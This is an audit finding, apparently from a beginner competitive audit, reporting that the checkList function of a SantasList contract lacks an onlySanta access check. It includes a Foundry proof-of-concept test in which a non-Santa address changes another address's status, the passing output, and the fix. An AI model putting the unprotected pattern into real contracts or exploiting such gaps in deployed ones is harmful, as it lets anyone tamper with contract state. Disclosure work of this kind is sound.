Beginner Friendly, Foundry
100 EXP
Submission Details
Severity: high
Valid

Anyone can call checkList function

Summary

The checkList function does not check that the caller is Santa, so it can be invoked by any address.

Vulnerability Details

Any address can call the checkList function and set the status of any address passed to it, writing directly into the mapping:

    mapping(address person => Status naughtyOrNice) private s_theListCheckedOnce;

Impact

TEST

    // impact of checkList function: a caller that is not Santa sets another address's status
    // `user` is a non-Santa address declared in the test contract's setup (not shown here)
    function testCheckList() public {
        address alice = makeAddr("alice");
        // using an address that is not santa to call `checkList` function
        vm.startPrank(user);
        santasList.checkList(alice, SantasList.Status.NICE);
        SantasList.Status aliceStatus = santasList.getNaughtyOrNiceOnce(alice);
        vm.stopPrank();
        console.logUint(uint(aliceStatus));
        // NICE is 0 in the Status enum; the call from `user` did not revert
        assertEq(uint(aliceStatus), 0);
    }

RESULT

Running the test from your terminal with:

    forge test --match-path ./test/SantasListPOCTest.t.sol -vv

prints:

    Running 1 test for test/SantasListPOCTest.t.sol:SantasListPOCTest
    [PASS] testCheckList() (gas: 20563)
    Logs:
    0

Tools Used

Manual review

Recommendations

Add the existing onlySanta modifier to the checkList function declaration, after its visibility keyword, so that only Santa can write to the list:

    // checkList function with modifier
    function checkList(address person, Status status) external onlySanta {
        s_theListCheckedOnce[person] = status;
        emit CheckedOnce(person, status);
    }
Updates

Lead Judging Commences

inallhonesty Lead Judge almost 2 years ago
Submission Judgement Published
Validated
Assigned finding tags:

Access Control on checkList()

Anyone is able to call checkList(), changing the status of a provided address. This is not intended functionality; it is meant to be callable only by Santa.
